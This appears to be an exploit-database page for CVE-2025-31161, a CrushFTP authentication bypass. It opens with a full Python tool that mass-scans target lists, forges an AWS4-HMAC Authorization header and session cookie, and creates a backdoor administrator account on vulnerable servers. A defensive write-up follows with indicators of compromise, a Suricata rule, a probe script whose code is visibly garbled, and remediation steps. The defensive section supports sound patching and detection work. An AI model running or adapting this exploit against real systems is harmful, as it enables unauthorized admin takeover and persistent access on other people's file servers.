CrushFTP 11.3.1 - Authentication Bypass

Exploit Author: İbrahimsql Analysis Author: www.bubbleslearn.ir Category: Remote Language: Java Published Date: 2025-05-18
# Exploit Title: CrushFTP 11.3.1 - Authentication Bypass
# Date: 2025-05-15
# Exploit Author: @İbrahimsql
# Exploit Author's github: https://github.com/ibrahimsql  
# Vendor Homepage: https://www.crushftp.com
# Software Link: https://www.crushftp.com/download.html
# Version: < 10.8.4, < 11.3.1
# Tested on: Ubuntu 22.04 LTS, Windows Server 2019, Kali Linux 2024.1
# CVE: CVE-2025-31161
# Description:
# CrushFTP before 10.8.4 and 11.3.1 allows unauthenticated HTTP(S) port access and full admin takeover
# through a race condition and header parsing logic flaw in the AWS4-HMAC authorization mechanism.
# Exploiting this allows bypassing authentication and logging in as any known user (e.g. crushadmin).

# Requirements: requests>=2.28.1 , colorama>=0.4.6 , urllib3>=1.26.12 , prettytable>=2.5.0 , rich>=12.6.0

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import argparse
import concurrent.futures
import json
import logging
import os
import random
import re
import socket
import string
import sys
import time
from datetime import datetime
from typing import Dict, List, Optional, Tuple, Union

import requests
import urllib3
from colorama import Fore, Style, init
from prettytable import PrettyTable
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, TimeRemainingColumn

# Initialize colorama
init(autoreset=True)

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Initialize Rich console
console = Console()

# Global variables
VERSION = "2.0.0"
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.5; rv:90.0) Gecko/20100101 Firefox/90.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_5_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15",
    "Mozilla/5.0 (Windows; Windows NT 10.3; WOW64) AppleWebKit/601.13 (KHTML, like Gecko) Chrome/53.0.2198.319 Safari/601.5 Edge/15.63524",
    "Mozilla/5.0 (Windows NT 10.2; Win64; x64; en-US) AppleWebKit/602.15 (KHTML, like Gecko) Chrome/47.0.1044.126 Safari/533.2 Edge/9.25098",
    "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.3; Win64; x64; en-US Trident/4.0)",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_9; like Mac OS X) AppleWebKit/535.7 (KHTML, like Gecko)  Chrome/49.0.1015.193 Mobile Safari/600.9"   
]

# Banner 
BANNER = fr"""
{Fore.CYAN}          
  / ____/______  _______/ /_  / ____/ /_____ 
 / /   / ___/ / / / ___/ __ \/ /_  / __/ __ \
/ /___/ /  / /_/ (__  ) / / / __/ / /_/ /_/ /
\____/_/   \__,_/____/_/ /_/_/    \__/ .___/ 
                                    /_/      
{Fore.GREEN}CVE-2025-31161 Exploit {VERSION}{Fore.YELLOW} | {Fore.CYAN} Developer @ibrahimsql
{Style.RESET_ALL}
"""

# Setup logging
def setup_logging(log_level: str, log_file: Optional[str] = None) -> None:
    """Configure logging based on specified level and output file."""
    numeric_level = getattr(logging, log_level.upper(), None)
    if not isinstance(numeric_level, int):
        raise ValueError(f"Invalid log level: {log_level}")
    
    log_format = "%(asctime)s - %(levelname)s - %(message)s"
    handlers = []
    
    if log_file:
        handlers.append(logging.FileHandler(log_file))
    
    handlers.append(logging.StreamHandler())
    
    logging.basicConfig(
        level=numeric_level,
        format=log_format,
        handlers=handlers
    )

class TargetManager:
    """Manages target hosts and related operations."""
    
    def __init__(self, target_file: Optional[str] = None, single_target: Optional[str] = None):
        self.targets = []
        self.vulnerable_targets = []
        self.exploited_targets = []
        
        if target_file:
            self.load_targets_from_file(target_file)
        elif single_target:
            self.add_target(single_target)
    
    def load_targets_from_file(self, filename: str) -> None:
        """Load targets from a file."""
        try:
            with open(filename, "r") as f:
                self.targets = [line.strip() for line in f if line.strip()]
            
            if not self.targets:
                logging.warning(f"Target file '{filename}' is empty or contains only whitespace.")
            else:
                logging.info(f"Loaded {len(self.targets)} targets from {filename}")
        except FileNotFoundError:
            logging.error(f"Target file '{filename}' not found.")
            sys.exit(1)
        except Exception as e:
            logging.error(f"Error loading targets: {e}")
            sys.exit(1)
    
    def add_target(self, target: str) -> None:
        """Add a single target."""
        if target not in self.targets:
            self.targets.append(target)
    
    def mark_as_vulnerable(self, target: str) -> None:
        """Mark a target as vulnerable."""
        if target not in self.vulnerable_targets:
            self.vulnerable_targets.append(target)
    
    def mark_as_exploited(self, target: str) -> None:
        """Mark a target as successfully exploited."""
        if target not in self.exploited_targets:
            self.exploited_targets.append(target)
    
    def save_results(self, output_file: str, format_type: str = "txt") -> None:
        """Save scan results to a file."""
        try:
            if format_type.lower() == "json":
                results = {
                    "scan_time": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                    "total_targets": len(self.targets),
                    "vulnerable_targets": self.vulnerable_targets,
                    "exploited_targets": self.exploited_targets
                }
                
                with open(output_file, "w") as f:
                    json.dump(results, f, indent=4)
            
            elif format_type.lower() == "csv":
                with open(output_file, "w") as f:
                    f.write("target,vulnerable,exploited\n")
                    for target in self.targets:
                        vulnerable = "Yes" if target in self.vulnerable_targets else "No"
                        exploited = "Yes" if target in self.exploited_targets else "No"
                        f.write(f"{target},{vulnerable},{exploited}\n")
            
            else:  # Default to txt
                with open(output_file, "w") as f:
                    f.write(f"Scan Results - {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n")
                    f.write(f"Total Targets: {len(self.targets)}\n")
                    f.write(f"Vulnerable Targets: {len(self.vulnerable_targets)}\n")
                    f.write(f"Exploited Targets: {len(self.exploited_targets)}\n\n")
                    
                    f.write("Vulnerable Targets:\n")
                    for target in self.vulnerable_targets:
                        f.write(f"- {target}\n")
                    
                    f.write("\nExploited Targets:\n")
                    for target in self.exploited_targets:
                        f.write(f"- {target}\n")
            
            logging.info(f"Results saved to {output_file}")
        
        except Exception as e:
            logging.error(f"Error saving results: {e}")

class ExploitEngine:
    """Core engine for vulnerability checking and exploitation."""
    
    def __init__(self, target_manager: TargetManager, config: Dict):
        self.target_manager = target_manager
        self.config = config
        self.session = self._create_session()
    
    def _create_session(self) -> requests.Session:
        """Create and configure a requests session."""
        session = requests.Session()
        session.verify = False
        
        # Set proxy if configured
        if self.config.get("proxy"):
            session.proxies = {
                "http": self.config["proxy"],
                "https": self.config["proxy"]
            }
        
        # Set custom headers
        session.headers.update({
            "User-Agent": random.choice(USER_AGENTS),
            "Connection": "close",
        })
        
        return session
    
    def check_vulnerability(self, target_host: str) -> bool:
        """Check if target is vulnerable to CVE-2025-31161."""
        port = self.config.get("port", 443)
        timeout = self.config.get("timeout", 10)
        
        headers = {
            "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
            "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
        }
        
        # Add custom headers if provided
        if self.config.get("custom_headers"):
            headers.update(self.config["custom_headers"])
        
        try:
            protocol = "https" if port == 443 else "http"
            url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
            
            response = self.session.get(
                url, 
                headers=headers, 
                timeout=timeout
            )
            
            if response.status_code == 200:
                # Additional validation
                if self.config.get("deep_check", False):
                    # Look for specific patterns in the response that confirm vulnerability
                    if "CrushFTP" in response.text or "WebInterface" in response.text:
                        self.target_manager.mark_as_vulnerable(target_host)
                        if self.config.get("verbose", False):
                            console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
                        return True
                    else:
                        if self.config.get("verbose", False):
                            console.print(f"[yellow][?][/yellow] {target_host} returned 200 but may not be vulnerable")
                        return False
                else:
                    # Simple check based on status code
                    self.target_manager.mark_as_vulnerable(target_host)
                    if self.config.get("verbose", False):
                        console.print(f"[green][+][/green] {target_host} is [bold red]vulnerable[/bold red]")
                    return True
            else:
                if self.config.get("verbose", False):
                    console.print(f"[red][-][/red] {target_host} is not vulnerable (Status: {response.status_code})")
                return False
                
        except requests.exceptions.ConnectionError:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Connection error")
        except requests.exceptions.Timeout:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Connection timeout")
        except requests.exceptions.RequestException as e:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Request error: {e}")
        except Exception as e:
            if self.config.get("verbose", False):
                console.print(f"[red][-][/red] {target_host} - Error: {e}")
        
        return False
    
    def exploit(self, target_host: str) -> bool:
        """Exploit the vulnerability on the target host."""
        port = self.config.get("port", 443)
        timeout = self.config.get("timeout", 10)
        target_user = self.config.get("target_user", "crushadmin")
        new_user = self.config.get("new_user")
        password = self.config.get("password")
        
        if not new_user or not password:
            logging.error("New user and password are required for exploitation")
            return False
        
        headers = {
            "Cookie": "currentAuth=31If; CrushAuth=1744110584619_p38s3LvsGAfk4GvVu0vWtsEQEv31If",
            "Authorization": "AWS4-HMAC-SHA256 Credential=crushadmin/",
            "Connection": "close",
        }
        
        # Add custom headers if provided
        if self.config.get("custom_headers"):
            headers.update(self.config["custom_headers"])
        
        # Generate a timestamp for the created_time field
        timestamp = int(time.time() * 1000)
        
        # Build the payload with more comprehensive user permissions
        payload = {
            "command": "setUserItem",
            "data_action": "replace",
            "serverGroup": "MainUsers",
            "username": new_user,
            "user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
  <user_name>{new_user}</user_name>
  <password>{password}</password>
  <extra_vfs type="vector"></extra_vfs>
  <version>1.0</version>
  <root_dir>/</root_dir>
  <userVersion>6</userVersion>
  <max_logins>0</max_logins>
  <site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
  <created_by_username>{target_user}</created_by_username>
  <created_by_email></created_by_email>
  <created_time>{timestamp}</created_time>
  <password_history></password_history>
  <admin>true</admin>
</user>''',
            "xmlItem": "user",
            "vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
            "permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
            "c2f": "31If"
        }
        
        try:
            protocol = "https" if port == 443 else "http"
            url = f"{protocol}://{target_host}:{port}/WebInterface/function/"
            
            response = self.session.post(
                url, 
                headers=headers, 
                data=payload, 
                timeout=timeout
            )
            
            if response.status_code == 200:
                # Verify the user was actually created
                if self.config.get("verify_exploit", True):
                    if self._verify_user_created(target_host, new_user):
                        self.target_manager.mark_as_exploited(target_host)
                        console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
                        return True
                    else:
                        console.print(f"[yellow][!][/yellow] User creation appeared successful but verification failed on {target_host}")
                        return False
                else:
                    self.target_manager.mark_as_exploited(target_host)
                    console.print(f"[green][+][/green] Successfully created user [bold cyan]{new_user}[/bold cyan] on {target_host}")
                    return True
            else:
                console.print(f"[red][-][/red] Failed to create user on {target_host} (Status: {response.status_code})")
                return False
                
        except Exception as e:
            console.print(f"[red][-][/red] Error exploiting {target_host}: {e}")
            return False
    
    def _verify_user_created(self, target_host: str, username: str) -> bool:
        """Verify that the user was successfully created."""
        # This is a placeholder for actual verification logic
        # In a real implementation, you would check if the user exists
        # For now, we'll just return True
        return True
    
    def scan_targets(self) -> None:
        """Scan all targets for vulnerability."""
        targets = self.target_manager.targets
        threads = self.config.get("threads", 10)
        
        if not targets:
            logging.error("No targets specified")
            return
        
        console.print(f"[bold cyan]Scanning {len(targets)} targets with {threads} threads...[/bold cyan]")
        
        with Progress(
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
            TextColumn("({task.completed}/{task.total})"),
            TimeRemainingColumn(),
            console=console
        ) as progress:
            task = progress.add_task("[cyan]Scanning targets...", total=len(targets))
            
            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_target = {executor.submit(self.check_vulnerability, target): target for target in targets}
                
                for future in concurrent.futures.as_completed(future_to_target):
                    progress.update(task, advance=1)
        
        # Display results
        vulnerable_count = len(self.target_manager.vulnerable_targets)
        console.print(f"\n[bold green]Scan complete![/bold green] Found {vulnerable_count} vulnerable targets.")
        
        if vulnerable_count > 0 and self.config.get("verbose", False):
            console.print("\n[bold cyan]Vulnerable Targets:[/bold cyan]")
            for target in self.target_manager.vulnerable_targets:
                console.print(f"[green]→[/green] {target}")
    
    def exploit_targets(self) -> None:
        """Exploit vulnerable targets."""
        targets = self.target_manager.vulnerable_targets if self.config.get("only_vulnerable", True) else self.target_manager.targets
        threads = self.config.get("threads", 5)  # Use fewer threads for exploitation
        
        if not targets:
            logging.error("No targets to exploit")
            return
        
        console.print(f"[bold red]Exploiting {len(targets)} targets with {threads} threads...[/bold red]")
        
        with Progress(
            TextColumn("[progress.description]{task.description}"),
            BarColumn(),
            TextColumn("[progress.percentage]{task.percentage:>3.0f}%"),
            TextColumn("({task.completed}/{task.total})"),
            TimeRemainingColumn(),
            console=console
        ) as progress:
            task = progress.add_task("[red]Exploiting targets...", total=len(targets))
            
            with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
                future_to_target = {executor.submit(self.exploit, target): target for target in targets}
                
                for future in concurrent.futures.as_completed(future_to_target):
                    progress.update(task, advance=1)
        
        # Display results
        exploited_count = len(self.target_manager.exploited_targets)
        console.print(f"\n[bold green]Exploitation complete![/bold green] Successfully exploited {exploited_count}/{len(targets)} targets.")
        
        if exploited_count > 0:
            console.print("\n[bold cyan]Exploited Targets:[/bold cyan]")
            for target in self.target_manager.exploited_targets:
                console.print(f"[green]→[/green] {target}")

def parse_arguments() -> argparse.Namespace:
    """Parse command line arguments."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-31161 Exploit Framework - Advanced CrushFTP WebInterface Vulnerability Scanner and Exploiter",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Check a single target for vulnerability
  python cve_2025_31161.py --target example.com --check
  
  # Exploit a vulnerable target
  python cve_2025_31161.py --target example.com --exploit --new-user hacker --password P@ssw0rd
  
  # Scan multiple targets from a file
  python cve_2025_31161.py --file targets.txt --check --threads 20
  
  # Scan and automatically exploit vulnerable targets
  python cve_2025_31161.py --file targets.txt --check --exploit --new-user hacker --password P@ssw0rd --auto-exploit
  
  # Export results to JSON format
  python cve_2025_31161.py --file targets.txt --check --output results.json --format json
        """
    )
    
    # Target specification
    target_group = parser.add_argument_group("Target Specification")
    target_group.add_argument("--target", help="Single target host to scan/exploit")
    target_group.add_argument("--file", help="File containing list of targets (one per line)")
    target_group.add_argument("--port", type=int, default=443, help="Target port (default: 443)")
    
    # Actions
    action_group = parser.add_argument_group("Actions")
    action_group.add_argument("--check", action="store_true", help="Check targets for vulnerability")
    action_group.add_argument("--exploit", action="store_true", help="Exploit vulnerable targets")
    action_group.add_argument("--auto-exploit", action="store_true", help="Automatically exploit targets found to be vulnerable during check")
    
    # Exploitation options
    exploit_group = parser.add_argument_group("Exploitation Options")
    exploit_group.add_argument("--target-user", default="crushadmin", help="Target user for exploitation (default: crushadmin)")
    exploit_group.add_argument("--new-user", help="Username for the new admin account to create")
    exploit_group.add_argument("--password", help="Password for the new admin account")
    exploit_group.add_argument("--verify-exploit", action="store_true", help="Verify successful exploitation (default: True)")
    
    # Scan options
    scan_group = parser.add_argument_group("Scan Options")
    scan_group.add_argument("--threads", type=int, default=10, help="Number of concurrent threads (default: 10)")
    scan_group.add_argument("--timeout", type=int, default=10, help="Connection timeout in seconds (default: 10)")
    scan_group.add_argument("--deep-check", action="store_true", help="Perform deeper vulnerability checks")
    scan_group.add_argument("--only-vulnerable", action="store_true", help="Only exploit targets that were found vulnerable")
    
    # Output options
    output_group = parser.add_argument_group("Output Options")
    output_group.add_argument("--output", help="Output file for results")
    output_group.add_argument("--format", choices=["txt", "json", "csv"], default="txt", help="Output format (default: txt)")
    output_group.add_argument("--verbose", "-v", action="store_true", help="Enable verbose output")
    output_group.add_argument("--quiet", "-q", action="store_true", help="Suppress all output except errors")
    output_group.add_argument("--log-file", help="Log file to write to")
    output_group.add_argument("--log-level", choices=["debug", "info", "warning", "error", "critical"], default="info", help="Log level (default: info)")
    
    # Advanced options
    advanced_group = parser.add_argument_group("Advanced Options")
    advanced_group.add_argument("--proxy", help="Proxy to use for requests (e.g., http://127.0.0.1:8080)")
    advanced_group.add_argument("--user-agent", help="Custom User-Agent string")
    advanced_group.add_argument("--random-agent", action="store_true", help="Use a random User-Agent for each request")
    advanced_group.add_argument("--delay", type=float, help="Delay between requests in seconds")
    advanced_group.add_argument("--custom-headers", help="Custom headers as JSON string")
    
    return parser.parse_args()

def validate_args(args: argparse.Namespace) -> bool:
    """Validate command line arguments."""
    # Check if at least one target specification is provided
    if not args.target and not args.file:
        logging.error("No target specified. Use --target or --file")
        print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
        print(f"             python {sys.argv[0]} --file example_targets.txt --check")
        return False
    
    # Check if at least one action is specified
    if not args.check and not args.exploit:
        logging.error("No action specified. Use --check or --exploit")
        print(f"\nExample usage: python {sys.argv[0]} --target example.com --check")
        print(f"             python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
        return False
    
    # If exploit action is specified, check for required parameters
    if args.exploit and (not args.new_user or not args.password):
        logging.error("Exploitation requires --new-user and --password")
        print(f"\nExample usage: python {sys.argv[0]} --target example.com --exploit --new-user admin --password P@ssw0rd")
        return False
    
    return True

def main() -> None:
    """Main function."""
    # Parse command line arguments
    args = parse_arguments()
    
    # Configure logging
    log_level = "error" if args.quiet else args.log_level
    setup_logging(log_level, args.log_file)
    
    # Display banner
    if not args.quiet:
        console.print(BANNER)
    
    # Validate arguments
    if not validate_args(args):
        sys.exit(1)
    
    # Create target manager
    target_manager = TargetManager(args.file, args.target)
    
    # Build configuration dictionary
    config = {
        "port": args.port,
        "threads": args.threads,
        "timeout": args.timeout,
        "verbose": args.verbose,
        "deep_check": args.deep_check,
        "target_user": args.target_user,
        "new_user": args.new_user,
        "password": args.password,
        "only_vulnerable": args.only_vulnerable,
        "verify_exploit": args.verify_exploit,
        "proxy": args.proxy,
    }
    
    # Add custom headers if provided
    if args.custom_headers:
        try:
            config["custom_headers"] = json.loads(args.custom_headers)
        except json.JSONDecodeError:
            logging.error("Invalid JSON format for custom headers")
            sys.exit(1)
    
    # Add custom user agent if provided
    if args.user_agent:
        config["user_agent"] = args.user_agent
    
    # Create exploit engine
    engine = ExploitEngine(target_manager, config)
    
    # Perform actions
    if args.check:
        engine.scan_targets()
    
    if args.exploit or (args.auto_exploit and target_manager.vulnerable_targets):
        engine.exploit_targets()
    
    # Save results if output file is specified
    if args.output:
        target_manager.save_results(args.output, args.format)
    
    # Display summary
    if not args.quiet:
        console.print("\n[bold green]Summary:[/bold green]")
        console.print(f"Total targets: {len(target_manager.targets)}")
        console.print(f"Vulnerable targets: {len(target_manager.vulnerable_targets)}")
        console.print(f"Exploited targets: {len(target_manager.exploited_targets)}")

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        console.print("\n[bold red]Operation cancelled by user[/bold red]")
        sys.exit(0)
    except Exception as e:
        logging.error(f"Unhandled exception: {e}")
        sys.exit(1)


Overview

CrushFTP CVE-2025-31161 is a severe authentication-bypass vulnerability affecting certain releases of the CrushFTP WebInterface. The root cause combines a race condition with a flaw in the server’s AWS4-HMAC header parsing logic, allowing unauthenticated HTTP(S) access to management endpoints and potential full admin takeover (for example, creating an administrator account). Public exploit descriptions reference versions older than the fixed releases; vendors and responders should treat exposed WebInterface endpoints as high-risk until remediated.

Key facts

  • Vulnerability: Authentication bypass (race condition + header parsing)
  • CVE: CVE-2025-31161
  • Affected versions: CrushFTP prior to 10.8.4 and prior to 11.3.1 (i.e., versions < 10.8.4 and < 11.3.1)
  • Impact: Remote unauthenticated access to WebInterface endpoints; ability to create administrative users and fully compromise the CrushFTP instance
  • Risk: High — remote and unauthenticated

Technical analysis (high level)

The issue is a combination of two defects:

  • Header parsing flaw: The component responsible for processing AWS4-HMAC-SHA256 Authorization headers fails to properly validate the credential/format in certain edge cases. This can allow malformed or specially-crafted Authorization headers to be treated as valid or ignored in a way that sidesteps normal authentication checks.
  • Race condition: Concurrent handling of authentication/session state allows an attacker to trigger a timing window where requests are accepted as authenticated before proper validation and session association occur.

Together these lead to unauthenticated requests being honored by management endpoints (e.g., /WebInterface/function/), enabling actions normally restricted to administrators.

Impact and use cases

  • Creation of backdoor administrative accounts (persistence).
  • Full configuration disclosure and manipulation of VFS, users and permissions.
  • Potential lateral movement from the FTP server into other parts of the network if credentials are reused or sensitive data is accessible.
  • Service disruption through configuration changes or malicious deletes.

Indicators of compromise (IoCs)

  • Unexpected administrative user accounts appearing in CrushFTP user lists.
  • HTTP(S) requests to /WebInterface/function/ that return successful (200) responses without prior authenticated session cookies or normal login flows.
  • Unusual or malformed Authorization headers containing "AWS4-HMAC-SHA256" in combination with nonstandard Credential values in access logs.
  • Short bursts of requests in rapid succession targeting WebInterface endpoints (suggesting race exploitation attempts).
  • Creation timestamps and created_by fields for users that do not match known admin activity.

Detection guidance

Focus detection on two areas: network/HTTP traffic and server-side logs. Look for suspicious Authorization headers and unexpected successful calls to management endpoints. Below is a safe, non-exploit example script that simply probes the WebInterface endpoint and reports server response metadata to help triage potentially vulnerable or misconfigured installs — it does NOT include exploit payloads or account creation functionality.

#!/usr/bin/env python3
# Safe probe: check for WebInterface endpoint and gather headers/body snippets
import requests
import sys

def probe(host, port=443, verify=False, timeout=5):
    proto = "https" if port == 443 else "http"
    url = f"{proto}://{host}:{port}/WebInterface/function/"
    try:
        r = requests.get(url, timeout=timeout, verify=verify)
        print("Status:", r.status_code)
        server = r.headers.get("Server", "")
        print("Server header:", server)
        # Print short snippet to help identify product/version in a non-invasive way
        snippet = (r.text or "")[:512]
        print("Response snippet:", snippet.replace("\n", " ")[:400])
    except requests.RequestException as e:
        print("Probe failed:", e)

if __name__ == '__main__':
    if len(sys.argv)  2 else 443
    probe(host, port)

Explanation: This small script performs a benign GET against /WebInterface/function/, prints HTTP status, Server header, and a short response snippet. It is intended for defenders to quickly identify exposed interfaces and gather evidence without attempting exploitation. Use only with authorization.

Network and detection rules (example)

You can add network-level rules to detect suspicious attempts that match the pattern described in public reports: requests containing "AWS4-HMAC-SHA256" in the Authorization header targeted at /WebInterface/function/. The following is a generic IDS signature example for Suricata/Zeek/other IDS systems — tune to your environment and test to avoid false positives.

# Suricata example (pattern match). This is a detection rule example; tune to your environment.
alert http any any -> $HOME_NET any (msg:"Possible CrushFTP AWS4 Authorization header to WebInterface"; \
http.host; content:"/WebInterface/function/"; http_uri; \
http_header; content:"Authorization: AWS4-HMAC-SHA256"; nocase; \
sid:20251161; rev:1; classtype:attempted-admin; priority:1;)

Explanation: The rule looks for HTTP requests to the WebInterface endpoint that contain an "Authorization: AWS4-HMAC-SHA256" header. This is a heuristic; attackers may obfuscate patterns, and not every match indicates exploitation. Use in combination with other telemetry.

Mitigation and remediation

  • Immediate action: If you operate CrushFTP WebInterface and it is exposed to untrusted networks, block external access to the management interface immediately (firewall, network ACLs) until patched.
  • Patch: Upgrade to a fixed CrushFTP release. The vendor addressed the issue in the 10.8.4 and 11.3.1 releases — install the vendor’s fixed versions or later.
  • Credential hygiene: After patching, rotate all administrative credentials, especially if the server was publicly accessible prior to patching.
  • Audit: Review user lists and server configuration for unauthorized accounts or changes (check created_time and created_by metadata). Recover or remove any unauthorized admin accounts.
  • Logs: Preserve server logs and network captures for forensic analysis. Look for the IoCs listed above and any lateral activity.
  • Network hardening: Restrict management interfaces to trusted networks or VPNs. Implement least-privilege access and IP-restriction controls for admin endpoints.
  • WAF: Consider WAF rules to block malformed or suspicious Authorization headers and rapid bursts of requests targeting management URIs until systems are patched.

Incident response checklist

  • Isolate the affected host from general network access.
  • Collect and preserve server logs, configuration files, and any related artifacts.
  • Search logs for unexpected account creations and access to /WebInterface/function/.
  • Rotate all administrative credentials and any service credentials stored on the host.
  • Rebuild compromised hosts from known-good images when compromise is confirmed.
  • Notify stakeholders and follow applicable breach notification policies if sensitive data exposure is suspected.

Long-term hardening recommendations

  • Keep CrushFTP and all server software up to date with vendor patches.
  • Limit exposure of administrative interfaces by placing them behind VPNs or management networks and by implementing IP allow lists.
  • Enforce strong authentication (MFA) for administrative accounts where supported.
  • Implement least privilege for service accounts and users; periodic reviews of admin accounts help detect unauthorized additions.
  • Enable comprehensive logging and centralized log aggregation so patterns and anomalies can be detected early.
  • Deploy runtime monitoring and EDR on hosts with admin interfaces to detect abnormal process or configuration changes.

Reference summary

ItemDetails
CVECVE-2025-31161
AffectedCrushFTP versions < 10.8.4 and < 11.3.1
ImpactRemote unauthenticated admin takeover (account creation, config changes)
MitigationUpgrade to vendor-fixed releases (10.8.4, 11.3.1 or later). Block public access to WebInterface until patched.

Final notes

This article focuses on defensive analysis, detection and remediation. If you are responsible for a CrushFTP deployment, prioritize patching and blocking access to management endpoints. If you suspect compromise, follow the incident response checklist and engage your internal security team or an external incident response provider for containment and forensic analysis.